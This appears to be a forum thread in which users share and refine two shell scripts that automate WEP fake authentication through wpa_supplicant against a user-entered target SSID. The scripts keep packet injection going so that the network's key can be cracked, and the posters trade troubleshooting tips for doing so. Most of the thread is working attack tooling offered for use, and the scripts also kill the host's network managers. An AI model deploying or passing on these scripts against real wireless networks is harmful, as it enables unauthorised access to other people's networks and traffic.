I just tried some scripts but... they don't work!
Your script works fine. I managed to inject once, and then on the same again later it didn't work.
On my other router it freezes after a few hundred.
A question however:
What would happen if you have 2 with the same ESSID?
If they are on different channels then simply lock onto the channel with the essid you wish to crack. If they have the same essid and the same channel, then you would have to modify the script to also check for this then ask for the bssid as well, but this is an unlikely circumstance.
It's a simple script meant to take the work out of continuously modifying the wpa_supplicant config file every time you want to fakeauth, so I'm sure there is a lot that could be improved.
After several days of trying to get this to work on my 4965, I finally got fake auth and injection working at the same time.
Finally tried a fresh copy of BT4 booting to a non-persist USB drive, BT4 out of the box.
I used the shell script Zermelo posted but I modified wep_key0 from 1801b56668 to "fakeauth". Without the quotes it would not work for me. It would successfully connect, but IV never increased while injecting. Both ARP Request and Fragmentation have been successful.
The only problem I've encountered is that it appears wpa_supplicant seems to lose the fake auth connection without notification. There are periods where my IV won't increase for a period of 60 sec. or more. It eventually corrects itself, or I manually kill the shell script and restart it and they start increasing again.
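Code:
#!/bin/sh
# Remove any old config (-f: no error if it does not exist yet)
rm -f fake.conf
# Stop anything else that manages the wireless interface
killall NetworkManager
killall knetworkmanager
killall wpa_supplicant
clear
echo ""
echo "Enter the SSID of the Target Network:"
read -r SEL
# printf writes the newlines portably; "$SEL" is quoted so SSIDs with spaces survive.
# wep_key0 is the dummy value from the post and must stay in double quotes.
printf 'network={\n ssid="%s"\n key_mgmt=NONE\n wep_key0="fakeauth"\n}\n' "$SEL" > fake.conf
echo "Starting Fake Authentication with $SEL"
wpa_supplicant -c fake.conf -i wlan0 -Dwext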
Yes, when running the script, once it asks for the SSID enter it exactly as it appears in airodump-ng, no quotes.
If you're using the modified script I posted, copy it into a file called fakeit . Give it execute permissions and run.
# ./fakeit
will ask for the SSID
enter it exactly and you should be good.
I'm still having problems with wpa_supplicant losing the fake auth, forcing me to have to restart it.
So I added onto the shell script that was posted to continue to loop the fake auth connection.
If anyone else is having this problem, this will work around it. Run it, it will ask for the ESSID, the number of times to repeat, and the sec in between. Default times should be good enough for standard WEP crack.
Code:
#!/bin/sh
# Stop anything else that manages the wireless interface
killall NetworkManager
killall knetworkmanager
killall wpa_supplicant
clear
echo ""
echo "Enter the ESSID of the Target Network: (use last)"
read -r SEL
# Non-empty input: write a new config. Empty input: reuse the previous fake.conf.
if [ -n "$SEL" ]
then
    echo ""
    if [ -e fake.conf ]; then
        echo "Deleting old fake.conf"
        rm fake.conf
    fi
    # printf writes the newlines portably; "$SEL" is quoted so ESSIDs with spaces survive
    printf 'network={\n ssid="%s"\n key_mgmt=NONE\n wep_key0="fakeauth"\n}\n' "$SEL" > fake.conf
    echo "Starting Fake Authentication with $SEL"
else
    if ! [ -e fake.conf ]; then
        echo "ERROR - No config found, Provide ESSID"
        exit 1
    fi
    echo ""
    echo "Starting Fake Authentication with Previous ESSID"
fi
echo ""
echo "How many times do you want to fake it? (30):"
read -r TIMES
if [ "$TIMES" = "" ]; then TIMES=30; fi
echo ""
echo "How many seconds between restarts? (45):"
read -r SEC
if [ "$SEC" = "" ]; then SEC=45; fi
i=1
# Start wpa_supplicant in the background (-B) TIMES times, SEC seconds apart
while [ "$i" -le "$TIMES" ]
do
    wpa_supplicant -c fake.conf -i wlan0 -Dwext -B
    echo ""
    echo "Fake Auth Connection ($i of $TIMES) Success ...maybe check airodump-ng to be sure."
    i=$((i + 1))
    if [ "$i" -le "$TIMES" ]; then
        echo "Reconnecting in $SEC seconds"
        sleep "$SEC"
        echo "Faking orgasam again... uh! ah! That's the spot!"
    fi
done